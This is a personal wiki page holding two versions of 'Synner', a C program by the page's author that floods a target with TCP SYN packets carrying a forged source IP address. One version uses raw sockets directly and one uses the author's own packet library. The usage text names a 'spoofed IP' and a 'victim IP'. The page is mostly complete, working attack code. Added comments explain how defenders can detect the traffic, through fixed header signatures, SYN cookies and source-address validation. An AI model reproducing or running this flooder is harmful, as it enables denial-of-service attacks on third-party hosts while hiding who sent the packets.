
differences

Created by pabrantes. Last edited by pabrantes, 2 years and 324 days ago. Viewed 1,124 times. #1
Without Package Lib

/* * Synner: * a normal raw Syn Spoofer * by P. Abrantes * * Network testing utility * */

#include <stdio.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/ip.h> #include <errno.h> #include <unistd.h> #include <sys/types.h> #include <netinet/tcp.h>

/* This is a checksum function that I saw * in the internet with some little modifications * to suit my needs */

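/*
 * csum - 16-bit one's-complement Internet checksum (the RFC 1071 scheme).
 *
 * addr: start of the data, read as native-endian 16-bit words.
 * len:  number of bytes to cover; a trailing odd byte is included.
 *
 * Returns the one's complement of the folded sum, ready to be stored in a
 * header checksum field. Summing a buffer that already contains its own
 * correct checksum yields 0.
 *
 * The accumulator is unsigned: the earlier signed int version overflowed
 * (undefined behaviour) once the running sum passed INT_MAX, which happens
 * with buffers of roughly 64 KiB and up, and it right-shifted a possibly
 * negative value while folding.
 */
unsigned short csum(unsigned short *addr, int len)
{
    unsigned long sum = 0;
    const unsigned short *word = addr;
    int remaining = len;

    /* Add the data one 16-bit word at a time. */
    while (remaining > 1) {
        sum += *word++;
        remaining -= 2;

        /* Fold early so the accumulator cannot wrap, whatever len is. */
        if (sum & 0x80000000UL)
            sum = (sum & 0xffffUL) + (sum >> 16);
    }

    /* Mop up an odd trailing byte: it occupies the first byte (in memory
     * order) of an otherwise zero 16-bit word. */
    if (remaining == 1) {
        unsigned short tail = 0;

        *(unsigned char *)&tail = *(const unsigned char *)word;
        sum += tail;
    }

    /* Fold every carry out of the low 16 bits back in. */
    while (sum >> 16)
        sum = (sum >> 16) + (sum & 0xffffUL);

    /* One's complement, truncated to 16 bits. */
    return (unsigned short)(~sum & 0xffffUL);
}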

/* Typedef is bad coding, so I simply won't use it :P */

/*
 * Buffer layout handed to sendto() by main(): an IPv4 header followed
 * directly by a TCP header, with no options and no payload.
 *
 * NOTE(review): the code relies on there being no padding between the two
 * members (tot_len and the send length are derived from the struct and
 * header sizes) - confirm for the target ABI.
 *
 * The trailing identifier also declares a file-scope object named
 * `package`; main() in this listing works through its own heap pointer
 * and does not reference that object.
 */
struct package {
    struct iphdr ipHeader ;     /* IPv4 header, filled in field by field in main() */
    struct tcphdr tcpHeader;    /* TCP header, SYN bit set in main() */

}package;

/*
 * TCP pseudo header used only as checksum input: source and destination
 * address, a zero byte, the protocol number and the TCP length, followed
 * by a copy of the TCP header itself. It is never put on the wire.
 *
 * NOTE(review): main() checksums sizeof(struct tcphdr)+12 bytes of this
 * struct, i.e. it assumes the five bit-fields pack into exactly 12 bytes
 * with no padding before `tcp`. Bit-field layout and the signedness of a
 * plain `int` bit-field are implementation-defined - confirm on the
 * compiler in use.
 *
 * The trailing identifier also declares a file-scope object named `pseudo`.
 */
struct pseudo {
    int saddr:32;       /* source address, copied from the IP header */
    int daddr:32;       /* destination address, copied from the IP header */
    int zero:8;         /* always written as 0 by main() */
    int PTCL:8;         /* protocol; main() stores IPPROTO_TCP */
    int TCP_len:16;     /* TCP length; main() stores htons(sizeof(struct tcphdr)) */
    struct tcphdr tcp;  /* copy of the TCP header being checksummed */
}pseudo;

/*
 * Builds one IPv4+TCP segment with the SYN bit set and a caller-supplied
 * source address (argv[1]), then sends it argv[4] times through a raw
 * socket with IP_HDRINCL enabled. Between sends only the TCP sequence
 * number and TCP checksum are refreshed.
 *
 * Arguments: argv[1] source address written into the IP header,
 *            argv[2] destination address written into the IP header,
 *            argv[3] destination TCP port,
 *            argv[4] number of packets.
 *
 * Defender's view of the traffic this listing produces:
 *   - source port (35555), window (5848), IP id and TTL (MAXTTL) are the
 *     same in every packet, so these header values work as a static
 *     signature;
 *   - the sequence numbers come from random() seeded with the port
 *     argument, so the series is reproducible for a given port;
 *   - forged-source SYNs are what SYN cookies on the listener and
 *     source-address validation at the network edge (BCP 38) are meant
 *     to neutralise.
 * Opening the raw socket normally requires elevated privilege (root or
 * CAP_NET_RAW on Linux).
 */
int main(int argc, char **argv) {

    struct package *flooder;    /* heap buffer holding the IP + TCP headers */
    struct sockaddr_in sin;     /* address structure passed to sendto() */
    struct pseudo header;       /* scratch pseudo header for the TCP checksum */
    int i,s, one=1;
    const int *value = &one;    /* option value for IP_HDRINCL */

    /* Exactly four arguments are required; otherwise print usage and exit. */
    if(argc!=5) {
        printf("%s <spoofed ip> <target ip> <target port> <number of packets>",argv[0]);
        exit(-1);
    }

    i = atoi(argv[4]);          /* packet count; atoi() reports no parse errors */
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = inet_addr(argv[1]);   /* address taken from argv[1] */
    sin.sin_port = htons(atoi(argv[3]));
    flooder = (struct package *)malloc(sizeof(struct package)); /* result is not checked */
    bzero(flooder,sizeof(flooder));

    /* Seed random() from the port argument: same port, same sequence series. */
    srandom((unsigned int) htons(atoi(argv[3])));

    /*
     * IP header: 20-byte header (ihl=5), IPv4, fixed id, maximum TTL,
     * protocol TCP. The header checksum is computed last, over the
     * header with its check field still zero.
     */
    flooder->ipHeader.ihl=5;
    flooder->ipHeader.version=4;
    flooder->ipHeader.tos=0;
    flooder->ipHeader.tot_len= htons(sizeof(struct package));
    flooder->ipHeader.id=htonl(54545);
    flooder->ipHeader.frag_off=0;
    flooder->ipHeader.ttl=MAXTTL;
    flooder->ipHeader.protocol=IPPROTO_TCP;
    flooder->ipHeader.check=0;
    flooder->ipHeader.saddr= inet_addr(argv[1]);    /* caller-chosen source address */
    flooder->ipHeader.daddr= inet_addr(argv[2]);
    flooder->ipHeader.check = csum( (unsigned short *)flooder, sizeof(struct iphdr));

    /*
     * TCP header: fixed source port and window, random initial sequence
     * number, SYN set, 20-byte header (doff=5).
     */

    flooder->tcpHeader.source = htons(35555);
    flooder->tcpHeader.dest = htons(atoi(argv[3]));
    flooder->tcpHeader.seq = htonl(random());
    flooder->tcpHeader.ack_seq = htonl(0);
    flooder->tcpHeader.syn=1;
    flooder->tcpHeader.window = htons(5848);
    flooder->tcpHeader.check=0;
    flooder->tcpHeader.doff=5;

    /* Pseudo header: addresses, protocol and TCP length plus a copy of the TCP header. */

    header.saddr = flooder->ipHeader.saddr;
    header.daddr = flooder->ipHeader.daddr;
    header.zero = 0;
    header.PTCL=IPPROTO_TCP;
    header.TCP_len = htons(sizeof(struct tcphdr));
    bcopy( (char *)&(flooder->tcpHeader), (char *)&header.tcp, sizeof(struct tcphdr));

    /* TCP checksum covers the 12 pseudo-header bytes plus the TCP header. */
    flooder->tcpHeader.check = csum( (unsigned short *)&header, sizeof(struct tcphdr)+12);

    /*
     * Open the raw socket. A failure here is only reported with perror();
     * execution continues with whatever value s holds.
     */

    if((s=socket(PF_INET, SOCK_RAW, IPPROTO_RAW))<0)
        perror("socket:");

    /* IP_HDRINCL: the program supplies the IP header itself. */
    if(setsockopt (s, SOL_IP, IP_HDRINCL, value, sizeof(one))!=0)
        perror("setsockopt");

    /* Send loop: one packet per iteration, i counts down to zero. */
    while(i>0) {

        /* Send the two headers; errors are reported but do not stop the loop. */
        if( sendto(s, flooder, sizeof(struct tcphdr)+sizeof(struct iphdr), 0, (struct sockaddr *)&sin, sizeof(sin)) <0)
            perror("sendto");

        /* Prepare the next packet: new sequence number, checksum cleared. */
        flooder->tcpHeader.seq=htonl(random());
        /*flooder->tcpHeader.source++; */
        flooder->tcpHeader.check = 0;
        /* Fill the pseudo header's TCP copy with 0x90 bytes; the bcopy below overwrites it. */
        memset(&(header.tcp),0x90,sizeof(struct tcphdr));

        /* Recompute the TCP checksum for the updated header. */
        bcopy( (char *)&(flooder->tcpHeader), (char *)&header.tcp, sizeof(struct tcphdr));
        flooder->tcpHeader.check = csum( (unsigned short *)&header, sizeof(struct tcphdr)+12);

        i--;
    }

    /* NOTE(review): the literal reads "Donen" on this page; presumably a
     * "\n" escape lost its backslash in rendering - confirm against the
     * original file. */
    printf("Donen");

}

Now let's see how it would be done using Package Lib:

/* * Synner Version 0.2 * * By P. Abrantes AKA Ghost_Rider */ #include "packager.h" #include <stdlib.h>

/*
 * Second version of the same tool, written against the author's
 * "packager" library. The helpers used here (allocTCPpackage,
 * build_IPpacket, build_TCPpacket, createSendingRawSock, resetIPid,
 * resetTCPsport, resetTCPseq, resetTCPcsum, sendPackage) come from
 * packager.h, which is not shown; the notes on them below are inferred
 * from their names and call sites and should be confirmed against the
 * library.
 *
 * Arguments: argv[1] source address, argv[2] destination address,
 *            argv[3] destination TCP port, argv[4] number of packets.
 *
 * Defender's view: unlike the listing without the library, the IP id,
 * source port and sequence number are re-drawn for every packet, so a
 * signature on those header values will not match; detection has to rest
 * on SYN rate and half-open connection state, and mitigation on SYN
 * cookies and source-address validation (BCP 38).
 */
int main(int argc, char *argv[]) {

    struct TCPpackage *theFlooder;  /* library packet object (IP + TCP parts) */
    struct sockaddr_in sin;         /* address structure passed to sendPackage() */
    int total, s, id, sport, seq;

    /* Exactly four arguments are required; otherwise print usage and exit. */
    if(argc!=5) {
        printf("Synner v0.2 (now using Packager lib).nUsage: %s <spoofed IP> <victim IP> <port> <number of packets>n", argv[0]);
        exit(-1);
    }

    theFlooder = allocTCPpackage();     /* result is not checked */
    srandom((unsigned int) htons(atoi(argv[3])));   /* seeds random(); the loop below calls rand() */
    total = atoi(argv[4]);              /* packet count; atoi() reports no parse errors */

    /* presumably builds the IP header from argv[1]/argv[2] with MAXTTL and protocol TCP - confirm */
    theFlooder->ip = build_IPpacket(argv[1], argv[2], 0, 0, MAXTTL, TCP, 0);
    /* presumably builds the TCP header for destination port argv[3]; the meaning of the
     * positional flag/size arguments is defined in packager.h - confirm */
    theFlooder->tcp = build_TCPpacket(0, atoi(argv[3]), 0, 0,1,0,0,0,0,0,4096,5,&(theFlooder->ip),0,NULL);
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = inet_addr(argv[1]);   /* address taken from argv[1] */
    sin.sin_port = htons(atoi(argv[3]));

    /* Socket creation failure is fatal here. */
    if(createSendingRawSock(&s)<0) {
        perror("createSendingRawSock:");
        exit(-1);
    }

    /* Send loop: one packet per iteration, total counts down to zero. */
    while(total>0) {
        /* Draw per-packet values: id in 1..1000, sport in 1..65000, seq in 1..999999. */
        id = 1+ (int) (1000.0*rand()/(RAND_MAX+1.0));
        sport = 1 + (int) (65000.0*rand()/(RAND_MAX+1.0));
        seq = 1 + (int) (999999.0*rand()/(RAND_MAX+1.0));

        /* Apply the new values, then refresh the checksum (helper semantics presumed). */
        resetIPid(&(theFlooder->ip), id);
        resetTCPsport(&(theFlooder->tcp), sport);
        resetTCPseq(&(theFlooder->tcp), seq);
        resetTCPcsum(theFlooder);

        /* Send errors are reported but do not stop the loop. */
        if(sendPackage(s, theFlooder, TCP, 0, sin)<0)
            perror("sendPackage:");
        total--;
    }
    printf("Done.");
}

Who am I?
My name is Paulo Abrantes AKA pabrantes and I'm a software developer. I'm currently employed at CIIST working as a Java developer in FenixEDU.

This blog is mostly about Java programming, domain driven design and snipsnap bliki developing. Everything written in this blog is my personal opinion and it may not reflect the opinions of my employer and co-workers.

